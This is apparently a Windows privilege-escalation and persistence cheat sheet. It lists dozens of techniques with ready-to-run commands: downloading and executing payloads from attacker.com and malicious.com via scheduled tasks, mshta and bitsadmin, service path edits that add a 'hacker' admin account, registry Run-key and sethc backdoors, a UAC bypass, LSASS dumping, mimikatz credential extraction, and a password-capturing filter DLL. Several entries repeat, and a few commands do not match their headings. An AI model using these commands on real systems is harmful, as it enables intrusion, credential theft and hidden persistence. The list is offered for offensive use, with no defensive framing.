Checklist Exploiting WMI Command Execution: Identify and exploit WMI command execution capabilities for privilege escalation. (Example: Execute arbitrary commands or scripts using WMI methods or classes to gain elevated privileges. Command: wmic /node:"target" process call create "cmd.exe /c malicious.exe") Exploiting Winlogon Hijacking: Identify and exploit vulnerabilities in the Windows Logon (Winlogon) process for privilege escalation. (Example: Modify Winlogon registry settings or binaries to execute code during system startup with elevated privileges. Command: reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe") Exploiting Service Registry Keys: Identify and exploit misconfigured or insecure service registry keys for privilege escalation. (Example: Modify service registry keys to execute arbitrary commands or binaries with elevated privileges. Command: sc config servicename binpath= "cmd /K net user hacker Password123 /add") Exploiting Registry Autoruns: Identify and exploit autorun registry keys for privilege escalation. (Example: Add malicious entries to autorun registry keys to execute arbitrary commands or scripts with elevated privileges. Command: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Malicious /t REG_SZ /d "cmd.exe /c malicious.exe" /f) Exploiting Scheduled Tasks with PowerShell: Identify and exploit scheduled tasks configured to run PowerShell scripts for privilege escalation. (Example: Modify scheduled task settings or script contents to execute arbitrary PowerShell commands with elevated privileges. Command: schtasks /Change /TN "TaskName" /TR "powershell -c Invoke-Expression 'New-Object Net.WebClient.DownloadFile(\"http://attacker.com/malicious.ps1\", \"C:\\Windows\\Temp\\malicious.ps1\"); Start-Process C:\\Windows\\Temp\\malicious.ps1'") Exploiting PowerShell RunAs: Identify and exploit PowerShell RunAs functionality for privilege escalation. (Example: Use PowerShell RunAs to execute commands with elevated privileges by specifying alternate credentials or execution context. Command: powershell -c Start-Process cmd -Credential (Get-Credential)) Exploiting PowerShell Deployment Configurations: Identify and exploit misconfigured or insecure PowerShell deployment configurations for privilege escalation. (Example: Abuse PowerShell execution policies or script signing requirements to execute malicious scripts or commands with elevated privileges. Command: powershell -ExecutionPolicy Bypass -File malicious.ps1) Exploiting PowerShell Profiles: Identify and exploit misconfigured PowerShell profiles for privilege escalation. (Example: Modify user or system-level PowerShell profiles to execute commands with elevated privileges during user or system startup. Command: notepad $PROFILE) Exploiting SMB Permissions: Identify and exploit misconfigured or insecure Server Message Block (SMB) permissions for privilege escalation. (Example: Exploit weak SMB share permissions to access sensitive files or directories. Command: net use \\target\share) Exploiting File Associations: Identify and exploit misconfigured or insecure file associations for privilege escalation. (Example: Modify file association settings to execute arbitrary commands or scripts with elevated privileges. Command: assoc .jpg=cmd /k) Exploiting Environment Variables: Identify and exploit environment variables for privilege escalation. (Example: Modify or exploit environment variable settings to execute commands with elevated privileges. Command: set PATH=C:\malicious;%PATH%) Exploiting DLL Hijacking: Identify and exploit Dynamic Link Library (DLL) hijacking vulnerabilities for privilege escalation. (Example: Place a malicious DLL with the same name as a legitimate system DLL in a directory included in the system's DLL search path. Command: copy malicious.dll C:\Windows\System32\) Exploiting User Account Control (UAC) Bypass: Identify and exploit UAC bypass techniques for privilege escalation. (Example: Use known UAC bypass methods to execute commands or binaries with elevated privileges without triggering UAC prompts. Command: reg add HKCU\Software\Classes\mscfile\shell\open\command /t REG_SZ /d "cmd /K") Exploiting PowerShell DLL Load: Identify and exploit DLL load vulnerabilities in PowerShell for privilege escalation. (Example: Load a malicious DLL from a writable directory to execute arbitrary code with elevated privileges. Command: powershell -ep bypass -c Add-Type -Path C:\Path\To\Malicious.dll; [MaliciousClass]::Method()) Exploiting Hidden Services: Identify and exploit hidden services or processes running with elevated privileges for privilege escalation. (Example: Abuse hidden services or processes to execute commands or scripts with elevated privileges. Command: tasklist /svc) Exploiting WMI Event Subscriptions: Identify and exploit WMI event subscriptions for privilege escalation. (Example: Register a malicious event filter or consumer to execute commands or scripts with elevated privileges. Command: wmic /NAMESPACE:\\root\subscription PATH __EventFilter CREATE Name="MaliciousFilter", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour BETWEEN 11 AND 14") Exploiting Persistence Mechanisms: Identify and exploit persistence mechanisms for maintaining elevated privileges across system reboots. (Example: Modify or abuse scheduled tasks, startup programs, or services to execute commands or scripts with elevated privileges. Command: schtasks /Create /SC ONSTART /TN MaliciousTask /TR "cmd /c malicious.exe" /RU System) Exploiting Kerberos Tickets: Identify and exploit Kerberos ticket vulnerabilities for privilege escalation. (Example: Exploit Kerberos ticket-related misconfigurations or vulnerabilities to impersonate other users or gain elevated privileges. Command: klist) Exploit Weak Service Permissions: Modify service DACLs to gain full control over services and replace binary paths. (Command: sc sdshow service to show, sc sdset service to modify) Use Alternate Data Streams: Hide malicious scripts in NTFS alternate data streams to evade detection and maintain persistence. (Command: echo 'malicious code' > file.txt:hidden.bat) Registry Persistence: Use registry to maintain persistence by adding programs to startup. (Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "App" /d "path_to_malicious_executable") Bypass AppLocker: Exploit AppLocker misconfigurations to execute unauthorized applications or scripts. (Method: Utilize signed binaries like msbuild, InstallUtil, or regsvr32 that can execute code.) Signed Binary Proxy Execution: Use Windows-signed binaries to proxy execution of malicious code. (Example: mshta.exe http://malicious.com/malicious.hta) Install Custom Password Filter DLL: Create and install a custom password filter DLL to capture passwords on change. (Example: reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Notification Packages" /t REG_MULTI_SZ /d mspassfilter) Token Impersonation/Theft: Exploit token impersonation to execute commands with elevated privileges. (Tool: Incognito, Command: list_tokens -u and impersonate_token "DOMAIN\\admin") Background Intelligent Transfer Service (BITS): Abuse BITS to download and execute malicious files bypassing firewalls. (Command: bitsadmin /transfer n /download /priority high http://malicious.com/malicious.exe C:\Windows\temp\malicious.exe) Exploit Hot Patching: Use undocumented Windows hot patching mechanisms to inject code into running processes. (Command: n/a, requires deep system knowledge) Exploit Unattended Install Files: Search for and leverage unattended installation files to extract sensitive information. (Example: type C:\Windows\Panther\Unattend\Unattend.xml) WMI Event Subscription: Use WMI for persistence and lateral movement by subscribing to permanent events. (Command: Set-WmiInstance -Namespace root\Subscription -Class __EventFilter -Arguments @{name='malicious'; EventNameSpace='root\cimv2'; Query="SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_Process'"}) SID History Injection: Inject SID into token to gain privileges associated with another user. (Example: Use Add-SIDHistory PowerShell cmdlet) Exploiting SMB Relay Attacks: Identify and exploit SMB relay attacks for privilege escalation. (Example: Intercept SMB traffic and relay authentication requests to execute commands or access resources with elevated privileges. Command: responder -I eth0 -rPv) Exploiting DCOM Privilege Escalation: Identify and exploit Distributed Component Object Model (DCOM) misconfigurations or vulnerabilities for privilege escalation. (Example: Exploit insecure DCOM permissions or interfaces to execute commands or scripts with elevated privileges. Command: sc config AppIDService binPath= "cmd /c malicious.exe" type= own) Exploiting Insecure File Permissions: Identify and exploit insecure file permissions for privilege escalation. (Example: Exploit files or directories with weak permissions to execute commands with elevated privileges. Command: icacls "C:\Program Files\Vulnerable Folder\" /grant Everyone:(OI)(CI)F) Exploiting Sudo Misconfigurations: Identify and exploit misconfigured sudo privileges for privilege escalation. (Example: Abuse sudo configurations to execute commands with elevated privileges. Command: sudo -l) Exploiting Misconfigured Services: Identify and exploit misconfigured or vulnerable services for privilege escalation. (Example: Exploit insecure service configurations to execute commands with elevated privileges. Command: sc config servicename binpath= "cmd /K net user hacker Password123 /add") Exploiting Registry ACL Permissions: Identify and exploit misconfigured registry ACL permissions for privilege escalation. (Example: Modify registry keys or values to execute commands with elevated privileges. Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Malicious /t REG_SZ /d "cmd.exe /c malicious.exe" /f) Exploiting DLL Hijacking in Services: Identify and exploit DLL hijacking vulnerabilities in services for privilege escalation. (Example: Place a malicious DLL with the same name as a legitimate system DLL in a directory included in the system's DLL search path. Command: copy malicious.dll C:\Windows\System32\) Exploiting Unquoted Service Paths: Identify and exploit unquoted service paths for privilege escalation. (Example: Exploit services with unquoted paths to execute arbitrary commands or scripts with elevated privileges. Command: sc qc ServiceName) Exploiting Registry Run Keys: Identify and exploit misconfigured or insecure registry run keys for privilege escalation. (Example: Add malicious entries to registry run keys to execute arbitrary commands or scripts with elevated privileges. Command: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Malicious /t REG_SZ /d "cmd.exe /c malicious.exe" /f) Exploiting Unsafe User Practices: Identify and exploit unsafe user practices for privilege escalation. (Example: Exploit users' behavior or actions to gain access or privileges beyond their intended scope. Command: net use \\target\IPC$ "" /user:"") Exploiting DPAPI Vulnerabilities: Identify and exploit vulnerabilities in the Data Protection API (DPAPI) for privilege escalation. (Example: Exploit weaknesses in DPAPI implementations to access encrypted data or credentials with elevated privileges. Command: mimikatz "dpapi::capi" /in:"hash") Exploiting NTFS Permissions: Identify and exploit misconfigured NTFS permissions for privilege escalation. (Example: Exploit files or directories with weak permissions to execute commands with elevated privileges. Command: icacls "C:\Program Files\Vulnerable Folder\" /grant Everyone:(OI)(CI)F) Exploiting Group Policy Misconfigurations: Identify and exploit misconfigured Group Policy settings for privilege escalation. (Example: Exploit insecure Group Policy configurations to execute commands or scripts with elevated privileges. Command: gpresult /SCOPE COMPUTER /Z) Exploiting Registry Autoruns: Identify and exploit autorun registry keys for privilege escalation. (Example: Add malicious entries to autorun registry keys to execute arbitrary commands or scripts with elevated privileges. Command: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Malicious /t REG_SZ /d "cmd.exe /c malicious.exe" /f) Exploiting Scheduled Tasks: Identify and exploit scheduled tasks for privilege escalation. (Example: Modify scheduled task settings or script contents to execute arbitrary commands or scripts with elevated privileges. Command: schtasks /Change /TN "TaskName" /TR "C:\Path\To\malicious.exe") Exploiting Unattended Installations: Identify and exploit unattended installation configurations for privilege escalation. (Example: Modify or abuse unattended installation files to execute arbitrary commands or scripts with elevated privileges. Command: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v Malicious /t REG_SZ /d "C:\Path\To\malicious.exe" /f) Exploiting Process Privilege Escalation: Identify and exploit processes running with elevated privileges for privilege escalation. (Example: Abuse processes or services running with SYSTEM or Administrator privileges to execute commands or access resources with elevated privileges. Command: tasklist /V /FI "MEMUSAGE gt 1000000") Exploiting LSASS Dump: Identify and exploit LSASS memory dump vulnerabilities for privilege escalation. (Example: Dump LSASS memory to extract credentials or perform Pass-the-Hash attacks for elevated privileges. Command: procdump64.exe -accepteula -ma lsass.exe lsass.dmp) Exploiting PowerUp AllChecks: Identify and exploit potential privilege escalation vectors using PowerUp's AllChecks module. (Example: Execute PowerUp's AllChecks to identify misconfigurations or vulnerabilities that can be exploited for privilege escalation. Command: Import-Module PowerUp; Invoke-AllChecks) Exploiting Windows Subsystem for Linux (WSL) Misconfigurations: Identify and exploit misconfigurations in WSL for privilege escalation. (Example: Access sensitive files or execute commands in the Windows environment from WSL using improper permissions.) Abusing User Environment Variables: Abuse user environment variables to execute malicious scripts or commands with elevated privileges. (Example: Exploit the PATH environment variable to execute a fake binary with higher privileges.) Exploiting Insecure File Permissions: Identify and exploit files with insecure permissions for privilege escalation. (Example: Modify configuration files or scripts with weak permissions to execute arbitrary commands.) Exploiting User-Installed Applications: Identify and exploit vulnerabilities in user-installed applications for privilege escalation. (Example: Exploit outdated or misconfigured software to gain access to sensitive system resources.) Abusing Startup Programs: Abuse startup programs to execute malicious scripts or commands with elevated privileges during system boot. (Example: Add a malicious entry to startup programs to gain persistence and execute commands as soon as the system starts.) Exploiting Scheduled Tasks with User Context: Identify and exploit scheduled tasks running in the user context for privilege escalation. (Example: Modify or hijack scheduled tasks to execute arbitrary commands with the user's privileges.) Abusing User Session Persistence Mechanisms: Abuse user session persistence mechanisms (e.g., session cookies, tokens) to gain unauthorized access to sensitive resources. (Example: Steal session cookies or tokens to impersonate authenticated users and access restricted areas.) Exploiting System-Level Configuration Files: Identify and exploit misconfigurations in system-level configuration files for privilege escalation. (Example: Modify critical system configuration files (e.g., /etc/passwd) to grant elevated privileges to a non-privileged user.) Abusing Temporary File Permissions: Abuse temporary files with insecure permissions to escalate privileges. (Example: Create or modify temporary files in a privileged directory to execute arbitrary commands.) Exploiting PowerShell Remoting Misconfigurations: Identify and exploit misconfigurations in PowerShell remoting settings for privilege escalation. (Example: Exploit insecure PowerShell remoting configurations to execute commands on remote systems with elevated privileges.)